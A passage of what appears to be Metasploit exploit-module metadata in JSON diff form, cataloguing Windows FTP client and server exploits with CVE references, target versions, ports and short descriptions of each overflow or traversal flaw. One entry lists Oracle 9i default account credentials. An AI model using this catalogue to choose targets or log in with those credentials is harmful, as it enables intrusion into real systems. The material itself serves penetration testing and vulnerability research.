[ + "jduck " + ], + "description": "This module exploits a format string vulnerability in HTTPDX FTP server.\n By sending a specially crafted FTP command containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.", + "references": [ + "CVE-2009-4769", + "OSVDB-60181" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic Targeting", + "httpdx 1.4 - Windows XP SP3 English", + "httpdx 1.4.5 - Windows XP SP3 English", + "httpdx 1.4.6 - Windows XP SP3 English", + "httpdx 1.4.6b - Windows XP SP3 English", + "httpdx 1.5 - Windows XP SP3 English" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/ftp/httpdx_tolog_format.rb", + "is_install_path": true, + "ref_name": "windows/ftp/httpdx_tolog_format", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/kmftp_utility_cwd": { + "name": "Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow", + "fullname": "exploit/windows/ftp/kmftp_utility_cwd", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-08-23", + "type": "exploit", + "author": [ + "Shankar Damodaran", + "Muhamad Fadzil Ramli " + ], + "description": "This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.\n Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which\n leads to an SEH overflow. Konica FTP allows anonymous access by default; valid\n credentials are typically unnecessary to exploit this vulnerability.", + "references": [ + "CVE-2015-7768", + "EDB-37908" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 7 SP1 x86" + ], + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/exploits/windows/ftp/kmftp_utility_cwd.rb", + "is_install_path": true, + "ref_name": "windows/ftp/kmftp_utility_cwd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/labf_nfsaxe": { + "name": "LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/labf_nfsaxe", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-05-15", + "type": "exploit", + "author": [ + "Tulpa", + "Daniel Teixeira" + ], + "description": "This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote\n code execution.", + "references": [ + "CVE-2017-18047", + "EDB-42011" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/labf_nfsaxe.rb", + "is_install_path": true, + "ref_name": "windows/ftp/labf_nfsaxe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/leapftp_list_reply": { + "name": "LeapFTP 3.0.1 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/leapftp_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r ", + "nullthreat" + ], + "description": "This module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n This issue is triggered when a file with a long name is downloaded/opened.", + "references": [ + "OSVDB-68640", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/leapftp_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/leapftp_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/leapftp_pasv_reply": { + "name": "LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow", + "fullname": "exploit/windows/ftp/leapftp_pasv_reply", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-06-09", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n client that is triggered through an excessively long PASV reply command. This\n module was ported from the original exploit by drG4njubas with minor improvements.", + "references": [ + "CVE-2003-0558", + "OSVDB-4587", + "BID-7860", + "EDB-54" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal LeapFTP.exe", + "Windows 2000 SP0/4 English", + "Windows XP SP0 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/leapftp_pasv_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/leapftp_pasv_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ms09_053_ftpd_nlst": { + "name": "MS09-053 Microsoft IIS FTP Server NLST Response Overflow", + "fullname": "exploit/windows/ftp/ms09_053_ftpd_nlst", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-08-31", + "type": "exploit", + "author": [ + "Kingcope ", + "hdm " + ], + "description": "This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n service. The flaw is triggered when a special NLST argument is passed\n while the session has changed into a long directory path. For this exploit\n to work, the FTP server must be configured to allow write access to the\n file system (either anonymously or in conjunction with a real account)", + "references": [ + "EDB-9541", + "CVE-2009-3023", + "OSVDB-57589", + "BID-36189", + "MSB-MS09-053" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 SP4 English/Italian (IIS 5.0)", + "Windows 2000 SP3 English (IIS 5.0)", + "Windows 2000 SP0-SP3 Japanese (IIS 5.0)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ms09_053_ftpd_nlst", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/netterm_netftpd_user": { + "name": "NetTerm NetFTPD USER Buffer Overflow", + "fullname": "exploit/windows/ftp/netterm_netftpd_user", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-04-26", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a vulnerability in the NetTerm NetFTPD\n application. This package is part of the NetTerm package.\n This module uses the USER command to trigger the overflow.", + "references": [ + "CVE-2005-1323", + "OSVDB-15865", + "URL-https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html", + "BID-13396" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "NetTerm NetFTPD Universal", + "Windows 2000 English", + "Windows XP English SP0/SP1", + "Windows 2003 English", + "Windows NT 4.0 SP4/SP5/SP6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/netterm_netftpd_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/netterm_netftpd_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/odin_list_reply": { + "name": "Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)", + "fullname": "exploit/windows/ftp/odin_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "rick2600", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n triggered when processing the response on a LIST command. During the overflow,\n a structured exception handler record gets overwritten.", + "references": [ + "OSVDB-68824", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/odin_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/odin_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/open_ftpd_wbem": { + "name": "Open-FTPD 1.2 Arbitrary File Upload", + "fullname": "exploit/windows/ftp/open_ftpd_wbem", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-18", + "type": "exploit", + "author": [ + "Serge Gorbunov", + "bcoles " + ], + "description": "This module exploits multiple vulnerabilities found in Open&Compact FTP\n server. The software contains an authentication bypass vulnerability and a\n arbitrary file upload vulnerability that allows a remote attacker to write\n arbitrary files to the file system as long as there is at least one user\n who has permission.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.", + "references": [ + "OSVDB-65687", + "EDB-13932", + "CVE-2010-2620" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Open&Compact FTP 1.2 on Windows (Before Vista)" + ], + "mod_time": "2021-02-18 09:18:19 +0000", + "path": "/modules/exploits/windows/ftp/open_ftpd_wbem.rb", + "is_install_path": true, + "ref_name": "windows/ftp/open_ftpd_wbem", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/ftp/oracle9i_xdb_ftp_pass": { + "name": "Oracle 9i XDB FTP PASS Overflow (win32)", + "fullname": "exploit/windows/ftp/oracle9i_xdb_ftp_pass", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "By passing an overly long string to the PASS command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference.", + "references": [ + "CVE-2003-0727", + "OSVDB-2449", + "BID-8375", + "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 2100, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Oracle 9.2.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb", + "is_install_path": true, + "ref_name": "windows/ftp/oracle9i_xdb_ftp_pass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/oracle9i_xdb_ftp_unlock": { + "name": "Oracle 9i XDB FTP UNLOCK Overflow (win32)", + "fullname": "exploit/windows/ftp/oracle9i_xdb_ftp_unlock", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-08-18", + "type": "exploit", + "author": [ + "MC ", + "David Litchfield " + ], + "description": "By passing an overly long token to the UNLOCK command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference. Oracle9i includes a number of default accounts,\n including dbsnmp:dbsmp, scott:tiger, system:manager, and\n sys:change_on_install.", + "references": [ + "CVE-2003-0727", + "OSVDB-2449", + "BID-8375", + "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 2100, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Oracle 9.2.0.1 Universal" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb", + "is_install_path": true, + "ref_name": "windows/ftp/oracle9i_xdb_ftp_unlock", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/pcman_put": { + "name": "PCMAN FTP Server Buffer Overflow - PUT Command", + "fullname": "exploit/windows/ftp/pcman_put", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-08-07", + "type": "exploit", + "author": [ + "Jay Turla", + "Chris Higgins" + ], + "description": "This module exploits a buffer overflow vulnerability found in the PUT command of the\n PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous\n credentials are enabled.", + "references": [ + "CVE-2013-4730", + "EDB-37731", + "OSVDB-94624" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/pcman_put.rb", + "is_install_path": true, + "ref_name": "windows/ftp/pcman_put", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/pcman_stor": { + "name": "PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/pcman_stor", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-27", + "type": "exploit", + "author": [ + "Christian (Polunchis) Ramirez", + "Rick (nanotechz9l) Flores" + ], + "description": "This module exploits a buffer overflow vulnerability found in the STOR command of the\n PCMAN FTP v2.07 Server when the \"/../\" parameters are also sent to the server. Please\n note authentication is required in order to trigger the vulnerability. The overflowing\n string will also be seen on the FTP server log console.", + "references": [ + "CVE-2013-4730", + "OSVDB-94624", + "EDB-27703" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/pcman_stor.rb", + "is_install_path": true, + "ref_name": "windows/ftp/pcman_stor", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/proftp_banner": { + "name": "ProFTP 2.9 Banner Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/proftp_banner", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-08-25", + "type": "exploit", + "author": [ + "His0k4 " + ], + "description": "This module exploits a buffer overflow in the ProFTP 2.9\n client that is triggered through an excessively long welcome message.", + "references": [ + "CVE-2009-3976", + "OSVDB-57394", + "URL-http://www.labtam-inc.com/index.php?act=products&pid=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/proftp_banner.rb", + "is_install_path": true, + "ref_name": "windows/ftp/proftp_banner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/quickshare_traversal_write": { + "name": "QuickShare File Server 1.2.1 Directory Traversal Vulnerability", + "fullname": "exploit/windows/ftp/quickshare_traversal_write", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-02-03", + "type": "exploit", + "author": [ + "modpr0be", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in QuickShare File Server's FTP\n service. By supplying \"../\" in the file path, it is possible to trigger a\n directory traversal flaw, allowing the attacker to read a file outside the\n virtual directory. By default, the \"Writable\" option is enabled during account\n creation, therefore this makes it possible to create a file at an arbitrary\n location, which leads to remote code execution.", + "references": [ + "OSVDB-70776", + "EDB-16105", + "URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html", + "URL-http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "QuickShare File Server 1.2.1" + ], + "mod_time": "2021-02-18 09:18:19 +0000", + "path": "/modules/exploits/windows/ftp/quickshare_traversal_write.rb", + "is_install_path": true, + "ref_name": "windows/ftp/quickshare_traversal_write", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ricoh_dl_bof": { + "name": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", + "fullname": "exploit/windows/ftp/ricoh_dl_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-01", + "type": "exploit", + "author": [ + "Julien Ahrens", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\n service. By supplying a long string of data to the USER command, it is\n possible to trigger a stack-based buffer overflow, which allows remote code\n execution under the context of the user.\n\n Please note that in order to trigger the vulnerability, the server must\n be configured with a log file name (by default, it's disabled).", + "references": [ + "CVE-2012-5002", + "OSVDB-79691", + "URL-http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/", + "URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/ftp/ricoh_dl_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ricoh_dl_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/sami_ftpd_list": { + "name": "Sami FTP Server LIST Command Buffer Overflow", + "fullname": "exploit/windows/ftp/sami_ftpd_list", + "aliases": [], + "rank": 100, + "disclosure_date": "2013-02-27", + "type": "exploit", + "author": [ + "superkojiman", + "Doug Prostko " + ], + "description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. On the other hand, the source IP address used\n to connect with the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.", + "references": [ + "OSVDB-90815", + "BID-58247", + "EDB-24557" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Sami FTP Server 2.0.1 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/sami_ftpd_list.rb", + "is_install_path": true, + "ref_name": "windows/ftp/sami_ftpd_list", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/sami_ftpd_user": { + "name": "KarjaSoft Sami FTP Server v2.0.2 USER Overflow", + "fullname": "exploit/windows/ftp/sami_ftpd_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-01-24", + "type": "exploit", + "author": [ + "Muhammad Ahmed Siddiqui", + "Critical Security", + "n30m1nd", + "aushack ", + "bcoles " + ], + "description": "This module exploits an unauthenticated stack buffer overflow in\n KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long\n USER string during login.\n\n The payload is triggered when the administrator opens the application\n GUI. If the GUI window is open at the time of exploitation, the\n payload will be executed immediately. Keep this in mind when selecting\n payloads. The application will crash following execution of the\n payload and will not restart automatically.\n\n When the application is restarted, it will re-execute the payload\n unless the payload has been manually removed from the SamiFTP.binlog\n log file.\n\n This module has been tested successfully on Sami FTP Server versions:\n 2.0.2 on Windows XP SP0 (x86);\n 2.0.2 on Windows 7 SP1 (x86);\n 2.0.2 on Windows 7 SP1 (x64); and\n 2.0.2 on Windows 10 (1909) (x64).", + "references": [ + "CVE-2006-0441", + "CVE-2006-2212", + "OSVDB-25670", + "BID-16370", + "BID-22045", + "BID-17835", + "EDB-1448", + "EDB-1452", + "EDB-1462", + "EDB-3127", + "EDB-3140", + "EDB-40675" + ], + "platform": "Windows", + "arch": "x86", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Sami FTP Server version 2.0.2" + ], + "mod_time": "2021-02-25 20:53:30 +0000", + "path": "/modules/exploits/windows/ftp/sami_ftpd_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/sami_ftpd_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/sasser_ftpd_port": { + "name": "Sasser Worm avserve FTP PORT Buffer Overflow", + "fullname": "exploit/windows/ftp/sasser_ftpd_port", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-05-10", + "type": "exploit", + "author": [ + "valsmith ", + "chamuco ", + "aushack " + ], + "description": "This module exploits the FTP server component of the Sasser worm.\n By sending an overly long PORT command the stack can be overwritten.", + "references": [ + "OSVDB-6197" + ], + "platform": "Windows", + "arch": "x86", + "rport": 5554, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP0", + "Windows XP SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/sasser_ftpd_port.rb", + "is_install_path": true, + "ref_name": "windows/ftp/sasser_ftpd_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/scriptftp_list": { + "name": "ScriptFTP LIST Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/scriptftp_list", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-10-12", + "type": "exploit", + "author": [ + "modpr0be", + "TecR0c ", + "mr_me " + ], + "description": "AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow\n vulnerability that is triggered when processing a sufficiently long\n filename during a FTP LIST command resulting in overwriting the\n exception handler. Social engineering of executing a specially crafted\n ftp file by double click will result in connecting to our malicious\n server and perform arbitrary code execution which allows the attacker to\n gain the same rights as the user running ScriptFTP. This vulnerability\n affects versions 3.3 and earlier.", + "references": [ + "CVE-2011-3976", + "OSVDB-75633", + "EDB-17876", + "US-CERT-VU-440219" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Windows Vista" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/scriptftp_list.rb", + "is_install_path": true, + "ref_name": "windows/ftp/scriptftp_list", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/seagull_list_reply": { + "name": "Seagull FTP v3.3 Build 409 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/seagull_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r " + ], + "description": "This module exploits a buffer overflow in the Seagull FTP client that gets\n triggered when the ftp client processes a response to a LIST command. If the\n response contains an overly long file/folder name, a buffer overflow occurs,\n overwriting a structured exception handler.", + "references": [ + "OSVDB-94556", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/seagull_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/seagull_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/servu_chmod": { + "name": "Serv-U FTP Server Buffer Overflow", + "fullname": "exploit/windows/ftp/servu_chmod", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-12-31", + "type": "exploit", + "author": [ + "theLightCosine " + ], + "description": "This module exploits a stack buffer overflow in the site chmod command\n in versions of Serv-U FTP Server prior to 4.2.\n\n You must have valid credentials to trigger this vulnerability. Exploitation\n also leaves the service in a non-functional state.", + "references": [ + "CVE-2004-2111", + "OSVDB-3713", + "BID-9483" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 SP0-4 EN", + "Windows XP SP0-1 EN" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/servu_chmod.rb", + "is_install_path": true, + "ref_name": "windows/ftp/servu_chmod", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/servu_mdtm": { + "name": "Serv-U FTPD MDTM Overflow", + "fullname": "exploit/windows/ftp/servu_mdtm", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-02-26", + "type": "exploit", + "author": [ + "spoonm " + ], + "description": "This is an exploit for the Serv-U\\'s MDTM command timezone\n overflow. It has been heavily tested against versions\n 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n nt4/2k/xp/2k3. I have also had success against version 3,\n but only tested 1 version/os. The bug is in all versions\n prior to 5.0.0.4, but this exploit will not work against\n versions not listed above. You only get one shot, but it\n should be OS/SP independent.\n\n This exploit is a single hit, the service dies after the\n shellcode finishes execution.", + "references": [ + "CVE-2004-0330", + "OSVDB-4073", + "URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html", + "BID-9751" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Serv-U Uber-Leet Universal ServUDaemon.exe", + "Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe", + "Serv-U 5.0.0.0 ServUDaemon.exe" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/ftp/servu_mdtm.rb", + "is_install_path": true, + "ref_name": "windows/ftp/servu_mdtm", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/slimftpd_list_concat": { + "name": "SlimFTPd LIST Concatenation Overflow", + "fullname": "exploit/windows/ftp/slimftpd_list_concat", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-07-21", + "type": "exploit", + "author": [ + "Fairuzan Roslan " + ], + "description": "This module exploits a stack buffer overflow in the SlimFTPd\n server. The flaw is triggered when a LIST command is\n received with an overly-long argument. This vulnerability\n affects all versions of SlimFTPd prior to 3.16 and was\n discovered by Raphael Rigo.", + "references": [ + "CVE-2005-2373", + "OSVDB-18172", + "BID-14339" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "SlimFTPd Server <= 3.16 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/slimftpd_list_concat.rb", + "is_install_path": true, + "ref_name": "windows/ftp/slimftpd_list_concat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/trellian_client_pasv": { + "name": "Trellian FTP Client 3.01 PASV Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/trellian_client_pasv", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-04-11", + "type": "exploit", + "author": [ + "zombiefx", + "dookie" + ], + "description": "This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n through an excessively long PASV message.", + "references": [ + "CVE-2010-1465", + "OSVDB-63812", + "EDB-12152" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/trellian_client_pasv.rb", + "is_install_path": true, + "ref_name": "windows/ftp/trellian_client_pasv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/turboftp_port": { + "name": "Turbo FTP Server 1.30.823 PORT Overflow", + "fullname": "exploit/windows/ftp/turboftp_port", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-10-03", + "type": "exploit", + "author": [ + "Zhao Liang", + "Lincoln", + "corelanc0d3r", + "thelightcosine" + ], + "description": "This module exploits a buffer overflow vulnerability found in the PORT\n command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote\n code execution under the context of SYSTEM.", + "references": [ + "EDB-22161", + "OSVDB-85887" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows Universal TurboFtp 1.30.823", + "Windows Universal TurboFtp 1.30.826" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 